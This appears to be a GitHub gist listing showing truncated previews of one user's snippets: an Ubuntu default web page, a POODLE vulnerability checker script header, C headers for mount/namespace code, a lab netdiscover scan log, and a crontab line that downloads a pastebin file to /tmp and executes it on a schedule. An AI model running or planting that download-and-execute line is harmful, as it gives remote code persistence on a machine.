This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> | |
<html xmlns="http://www.w3.org/1999/xhtml"> | |
<!-- | |
Modified from the Debian original for Ubuntu | |
Last updated: 2016-11-16 | |
See: https://launchpad.net/bugs/1288690 | |
--> | |
<head> | |
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# This script is just a small checker for hosts that may be vulnerable to POODLE. | |
# It tests all the hosts in the file "target_file.txt". | |
# Needed : | |
# 1) target_file.txt - with the ips to test | |
# 2) scan_result_utp.txt - list of the open ports for that host | |
# [@setrus == [email protected]] | |
# Poodle Testing for ALL the open ports of the hosts | |
# Must be run in the same file as target_file.txt |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
51 14 * * * wget -O /tmp/command https://pastebin.com/raw/1Ru7ms7t && chmod +x /tmp/command && /tmp/command |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <sched.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
#include <sched.h> | |
#include <sys/stat.h> | |
#include <sys/types.h> | |
#include <sys/mount.h> | |
#include <stdio.h> | |
#include <stdlib.h> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Discovering Network | |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | |
root@setrus:~# netdiscover -r 192.168.56.0/24 | |
Currently scanning: Finished! | Screen View: Unique Hosts | |
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 | |
_____________________________________________________________________________ | |
IP At MAC Address Count Len MAC Vendor / Hostname |
NewerOlder